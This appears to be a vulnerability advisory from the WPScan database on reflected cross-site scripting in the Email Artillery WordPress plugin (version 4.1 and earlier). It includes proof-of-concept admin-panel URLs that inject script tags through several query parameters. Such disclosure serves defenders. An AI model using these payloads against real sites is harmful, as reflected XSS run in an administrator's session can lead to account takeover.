WordPress Plugin Vulnerabilities
Email Artillery <= 4.1 - Multiple Reflected Cross-Site Scripting
Description
The plugin does not sanitise, validate or escape some user input before outputting back in pages leading to Reflected Cross-Site Scripting issues which will be executed in the context of a logged in admin
Proof of Concept
https://example.com/wp-admin/admin.php?page=etmbu-all-posts&s=yes&markdone=no&cpage="><script>alert(%2FXSS%2F)<%2Fscript> https://example.com/wp-admin/admin.php?page=etmbu-all-emails&invalid=yes&site_id="><script>alert(/XSS-SiteID/)</script>&s="><script>alert(/XSS-S/)</script> https://example.com/wp-admin/admin.php?page=etmbu-all-emails&unsub=yes&site_id="><script>alert(%2FXSS-SiteID%2F)<%2Fscript>&s="><script>alert(%2FXSS-S%2F)<%2Fscript>
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-16 (about 2 years ago)
Added
2021-08-16 (about 2 years ago)
Last Updated
2021-08-16 (about 2 years ago)